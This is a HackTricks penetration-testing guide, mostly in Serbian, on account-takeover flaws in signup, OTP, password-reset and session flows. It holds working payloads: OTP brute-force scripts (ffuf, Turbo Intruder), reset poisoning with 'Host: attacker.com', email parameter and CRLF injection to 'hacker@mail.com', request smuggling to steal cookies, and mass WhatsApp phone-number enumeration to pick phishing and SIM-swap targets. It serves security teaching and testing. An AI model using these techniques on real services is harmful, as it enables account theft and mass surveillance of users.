Registracija & Takeover ranjivosti

Tip

Učite i vežbajte AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Učite i vežbajte GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Učite i vežbajte Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Podržite HackTricks

Registration Takeover

Dupla registracija

  • Pokušajte da kreirate koristeći već postojeće korisničko ime
  • Proverite varijacije email-a:
  • velika slova (uppercase)
  • +1@
  • dodajte tačku u email
  • specijalni karakteri u delu emaila (%00, %09, %20)
  • Stavite prazne karaktere posle emaila: test@test.com a
  • victim@gmail.com@attacker.com
  • victim@attacker.com@gmail.com
  • Isprobajte trikove kanonizacije pružaoca email-a (zavisno od servisa):
  • Gmail ignores dots and subaddressing: victim+1@gmail.com, v.ic.tim@gmail.com deliver to victim@gmail.com
  • Neki provajderi nisu osetljivi na velika/mala slova u lokalnom delu
  • Neki provajderi prihvataju unicode confusables. Probajte homoglife i soft hyphen \u00AD u lokalnom delu
  • Zloupotrebite ovo da: zaobiđete provere jedinstvenosti, dobijete duple naloge/workspace invites, ili blokirate prijave žrtve (privremeni DoS) dok pripremate takeover

Enumeracija korisničkih imena

Proverite da li možete utvrditi kada je korisničko ime već registrovano u aplikaciji.

  • Različite poruke o grešci ili HTTP status kodovi
  • Razlike u vremenu odgovora (postojeći korisnik može pokrenuti lookup ka IdP/DB)
  • Automatsko popunjavanje profila u formi registracije za poznate email adrese
  • Proverite team/invite tokove: unošenje emaila može otkriti da li nalog postoji

Politika lozinki

Prilikom kreiranja naloga proverite politiku lozinki (da li možete koristiti slabe lozinke).
U tom slučaju možete pokušati bruteforce credentials.

SQL Injection

Check this page da naučite kako pokušati preuzimanje naloga ili izvući informacije putem SQL Injection u registracionim formama.

Oauth Takeovers

OAuth to Account takeover

SAML Vulnerabilities

SAML Attacks

Promena email-a

Kada ste registrovani pokušajte promeniti email i proverite da li je promena pravilno validirana ili da li je možete promeniti na proizvoljne adrese.

Dodatne provere

  • Proverite da li možete koristiti disposable emails (mailinator, yopmail, 1secmail, itd.) ili zaobići blocklist subaddressingom kao victim+mailinator@gmail.com
  • Duga lozinka (>200) dovodi do DoS
  • Proverite rate limits na kreiranje naloga
  • Koristite username@burp_collab.net i analizirajte callback
  • Ako se koristi verifikacija telefonskog broja, proverite edge case-ove parsiranja/injekcije broja

Phone Number Injections

Captcha Bypass

Contact-discovery / identifier-enumeration oracles

Phone-number–centric messengers expose a presence oracle whenever the client syncs contacts. Replaying WhatsApp’s discovery requests historically delivered >100M lookups per hour, enabling near-complete account enumerations.

Tok napada

  1. Instrumentujte zvaničnog klijenta da uhvatite zahtev za upload address-book-a (authenticated blob of normalized E.164 numbers). Ponavljajte ga sa napadački generisanim brojevima dok ponovo koristite iste cookies/device token.
  2. Batch numbers per request: WhatsApp accepts thousands of identifiers and returns registered/unregistered plus metadata (business, companion, etc.). Analizirajte odgovore offline da izgradite listu ciljeva bez slanja poruka žrtvama.
  3. Horizontalo skalirajte enumeraciju koristeći SIM banke, cloud uređaje, ili residential proxies tako da ograničenja po nalogu/IP/ASN nikada ne budu aktivirana.

Dialing-plan modeling

Modelujte pozivni plan svake zemlje da biste preskočili nevažeće kandidate. The NDSS dataset (country-table.*) lists country codes, adoption density, and platform split so you can prioritize high-hit ranges. Example seeding code:

import pandas as pd
from itertools import product

df = pd.read_csv("country-table.csv")
row = df[df["Country"] == "India"].iloc[0]
prefix = "+91"  # India mobile numbers are 10 digits
for suffix in product("0123456789", repeat=10):
candidate = prefix + "".join(suffix)
enqueue(candidate)

Prioritizujte prefikse koji se poklapaju sa stvarnim alokacijama (Mobile Country Code + National Destination Code) pre nego što upitujete oracle, kako biste održali korisnu propusnost.

Pretvaranje enumerations u ciljane napade

  • Ubacite leaked phone numbers (npr. Facebook’s 2021 breach) u oracle da saznate koji identiteti su još aktivni pre phishing, SIM-swapping, ili spamming.
  • Segmentirajte cenzuse po zemlji/OS/tipu aplikacije da pronađete regione sa slabim SMS filtriranjem ili velikom upotrebom WhatsApp Business za lokalizovani social engineering.

Public-key reuse correlation

WhatsApp exposes each account’s X25519 identity key during session setup. Zatražite identity material za svaki enumerated broj i deduplicirajte public keys da otkrijete account farms, cloned clients, ili insecure firmware — shared keys deanonymize multi-SIM operacije.

Registration flows often verify ownership via a numeric OTP or a magic-link token. Tipične slabosti:

  • Predvidiv ili kratak OTP (4–6 cifara) bez efikasnog rate limiting-a ili praćenja IP/device. Probajte paralelna pogađanja i rotaciju headera/IP-a.
  • OTP reuse između akcija ili naloga, ili nije vezan za konkretnog korisnika/akciju (npr. isti kod radi za login i signup, ili radi nakon promene email-a).
  • Multi-value smuggling: neki backendi prihvataju više kodova i verifikuju ako bilo koji odgovara. Probajte:
  • code=000000&code=123456
  • JSON arrays: {"code":["000000","123456"]}
  • Mixed parameter names: otp=000000&one_time_code=123456
  • Comma/pipe separated values: code=000000,123456 or code=000000|123456
  • Response oracle: razlikujte wrong vs expired vs wrong-user kodove po statusu/poruci/dužini body-a.
  • Tokeni nisu invalidirani nakon uspeha ili nakon promene password/email-a.
  • Verification token nije vezan za user agent/IP, što omogućava cross-origin completion sa attacker-controlled stranica.

Bruteforcing example with ffuf against a JSON OTP endpoint:

ffuf -w <wordlist_of_codes> -u https://target.tld/api/verify -X POST \
-H 'Content-Type: application/json' \
-d '{"email":"victim@example.com","code":"FUZZ"}' \
-fr 'Invalid|Too many attempts' -mc all

Paralelno/konkurentno pogađanje za zaobilaženje sekvencijalnih zaključavanja (koristite Turbo Intruder u Burp):

Turbo Intruder isječak za preplavljivanje pokušaja 6-cifrenih OTP-ova ```python def queueRequests(target, wordlists): engine = RequestEngine(endpoint=target.endpoint, concurrentConnections=30, requestsPerConnection=100) for code in range(0,1000000): body = '{"email":"victim@example.com","code":"%06d"}' % code engine.queue(target.req, body=body)

def handleResponse(req, interesting): if req.status != 401 and b’Invalid’ not in req.response: table.add(req)

</details>

- Try racing verification: submit the same valid OTP simultaneously in two sessions; sometimes one session becomes a verified attacker account while the victim flow also succeeds.
- Also test Host header poisoning on verification links (same as reset poisoning below) to leak or complete verification on attacker controlled host.

<a class="content_ref" href="rate-limit-bypass.md"><span class="content_ref_label">Rate Limit Bypass</span></a>

<a class="content_ref" href="2fa-bypass.md"><span class="content_ref_label">2FA/MFA/OTP Bypass</span></a>

<a class="content_ref" href="email-injections.md"><span class="content_ref_label">Email Injections</span></a>

## Account Pre‑Hijacking Techniques (before the victim signs up)

A powerful class of issues occurs when an attacker performs actions on the victim’s email before the victim creates their account, then regains access later.

Key techniques to test (adapt to the target’s flows):

- Classic–Federated Merge
- Napadač: registers a classic account with victim email and sets a password
- Žrtva: later signs up with SSO (same email)
- Insecure merges may leave both parties logged in or resurrect the attacker’s access
- Unexpired Session Identifier
- Napadač: creates account and holds a long‑lived session (don’t log out)
- Žrtva: recovers/sets password and uses the account
- Test if old sessions stay valid after reset or MFA enablement
- Trojan Identifier
- Napadač: adds a secondary identifier to the pre‑created account (phone, additional email, or links attacker’s IdP)
- Žrtva: resets password; attacker later uses the trojan identifier to reset/login
- Unexpired Email Change
- Napadač: initiates email‑change to attacker mail and withholds confirmation
- Žrtva: recovers the account and starts using it
- Napadač: later completes the pending email‑change to steal the account
- Non‑Verifying IdP
- Napadač: uses an IdP that does not verify email ownership to assert `victim@…`
- Žrtva: signs up via classic route
- Service merges on email without checking `email_verified` or performing local verification

Practical tips

- Harvest flows and endpoints from web/mobile bundles. Look for classic signup, SSO linking, email/phone change, and password reset endpoints.
- Create realistic automation to keep sessions alive while you exercise other flows.
- For SSO tests, stand up a test OIDC provider and issue tokens with `email` claims for the victim address and `email_verified=false` to check if the RP trusts unverified IdPs.
- After any password reset or email change, verify that:
- all other sessions and tokens are invalidated,
- pending email/phone change capabilities are cancelled,
- previously linked IdPs/emails/phones are re‑verified.

Note: Extensive methodology and case studies of these techniques are documented by Microsoft’s pre‑hijacking research (see References at the end).

<a class="content_ref" href="reset-password.md"><span class="content_ref_label">Reset/Forgotten Password Bypass</span></a>

<a class="content_ref" href="race-condition.md"><span class="content_ref_label">Race Condition</span></a>

## **Password Reset Takeover**

### Password Reset Token Leak Via Referrer <a href="#password-reset-token-leak-via-referrer" id="password-reset-token-leak-via-referrer"></a>

1. Request password reset to your email address
2. Click on the password reset link
3. Don’t change password
4. Click any 3rd party websites(eg: Facebook, twitter)
5. Intercept the request in Burp Suite proxy
6. Check if the referer header is leaking password reset token.

### Password Reset Poisoning <a href="#account-takeover-through-password-reset-poisoning" id="account-takeover-through-password-reset-poisoning"></a>

1. Intercept the password reset request in Burp Suite
2. Add or edit the following headers in Burp Suite : `Host: attacker.com`, `X-Forwarded-Host: attacker.com`
3. Forward the request with the modified header\
`http POST https://example.com/reset.php HTTP/1.1 Accept: */* Content-Type: application/json Host: attacker.com`
4. Look for a password reset URL based on the _host header_ like : `https://attacker.com/reset-password.php?token=TOKEN`

### Password Reset Via Email Parameter <a href="#password-reset-via-email-parameter" id="password-reset-via-email-parameter"></a>
```bash
# parameter pollution
email=victim@mail.com&email=hacker@mail.com

# array of emails
{"email":["victim@mail.com","hacker@mail.com"]}

# carbon copy
email=victim@mail.com%0A%0Dcc:hacker@mail.com
email=victim@mail.com%0A%0Dbcc:hacker@mail.com

# separator
email=victim@mail.com,hacker@mail.com
email=victim@mail.com%20hacker@mail.com
email=victim@mail.com|hacker@mail.com

IDOR na API parametrima

  1. Napadač se mora prijaviti sa svojim nalogom i otići na funkciju Change password.
  2. Pokrenite Burp Suite i presretnite zahtev
  3. Pošaljite ga u repeater tab i izmenite parametre : User ID/email
    powershell POST /api/changepass [...] ("form": {"email":"victim@email.com","password":"securepwd"})

Slab token za reset lozinke

Password reset token treba da bude nasumično generisan i jedinstven svaki put.
Pokušajte da utvrdite da li token ističe ili je uvek isti; u nekim slučajevima algoritam generisanja je slab i može se pogoditi. Sledeće varijable mogu biti korišćene od strane algoritma.

  • Timestamp
  • UserID
  • Email of User
  • Firstname and Lastname
  • Date of Birth
  • Cryptography
  • Number only
  • Small token sequence ( characters between [A-Z,a-z,0-9])
  • Token reuse
  • Token expiration date

Leaking Password Reset Token

  1. Pokrenite zahtev za reset lozinke koristeći API/UI za određeni email npr: test@mail.com
  2. Pregledajte odgovor servera i proverite za resetToken
  3. Zatim upotrebite token u URL-u kao https://example.com/v3/user/password/reset?resetToken=[THE_RESET_TOKEN]&email=[THE_MAIL]

Reset lozinke putem kolizije korisničkog imena

  1. Registrujte se na sistemu sa korisničkim imenom identičnim žrtvinom korisničkom imenu, ali sa ubačenim praznim razmacima pre i/ili posle korisničkog imena. npr: "admin "
  2. Zatražite reset lozinke koristeći vaše maliciozno korisničko ime.
  3. Iskoristite token poslat na vaš email i resetujte žrtvinu lozinku.
  4. Prijavite se na žrtvin nalog sa novom lozinkom.

The platform CTFd was vulnerable to this attack.
See: CVE-2020-7245

Preuzimanje naloga putem Cross Site Scripting

  1. Pronađite XSS u aplikaciji ili na poddomeni ako su cookies scoped to the parent domain : *.domain.com
  2. Leak the current sessions cookie
  3. Autentifikujte se kao korisnik koristeći cookie

Preuzimanje naloga putem HTTP Request Smuggling

  1. Koristite smuggler da otkrijete tip HTTP Request Smuggling (CL, TE, CL.TE)
    powershell git clone https://github.com/defparam/smuggler.git cd smuggler python3 smuggler.py -h\
  2. Kreirajte zahtev koji će prebrisati POST / HTTP/1.1 sa sledećim podacima:
    GET http://something.burpcollaborator.net HTTP/1.1 X: sa ciljem da otvorite redirect žrtava ka burpcollab i ukradete njihove cookies\
  3. Finalni zahtev može izgledati ovako
GET / HTTP/1.1
Transfer-Encoding: chunked
Host: something.com
User-Agent: Smuggler/v1.0
Content-Length: 83
0

GET http://something.burpcollaborator.net  HTTP/1.1
X: X

Hackerone izveštaji o iskorišćavanju ovog buga\

Preuzimanje naloga putem CSRF

  1. Napravite payload za CSRF, npr: “HTML form with auto submit for a password change”
  2. Pošaljite payload

Preuzimanje naloga putem JWT

JSON Web Token might be used to authenticate an user.

  • Izmenite JWT sa drugim User ID / Email
  • Proverite slabost JWT potpisa

JWT Vulnerabilities (Json Web Tokens)

Registration-as-Reset (Upsert on Existing Email)

Neki signup handleri izvršavaju upsert kada prosleđeni email već postoji. Ako endpoint prihvata minimalno telo sa email-om i password-om i ne sprovodi verifikaciju vlasništva, slanje email-a žrtve će pre-auth prepisati njihov password.

  • Discovery: prikupite imena endpointa iz bundled JS (ili saobraćaja mobilne aplikacije), zatim fuzz-ujte osnovne putanje kao /parents/application/v4/admin/FUZZ koristeći ffuf/dirsearch.
  • Naznake metode: GET koji vraća poruke poput “Only POST request is allowed.” često nagoveštava ispravan HTTP metod i da se očekuje JSON telo.
  • Minimalno telo viđeno u praksi:
{"email":"victim@example.com","password":"New@12345"}

Primer PoC:

POST /parents/application/v4/admin/doRegistrationEntries HTTP/1.1
Host: www.target.tld
Content-Type: application/json

{"email":"victim@example.com","password":"New@12345"}

Uticaj: Potpuno preuzimanje naloga (ATO) bez ikakvog reset tokena, OTP-a ili verifikacije e-pošte.

Reference

Tip

Učite i vežbajte AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Učite i vežbajte GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Učite i vežbajte Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Podržite HackTricks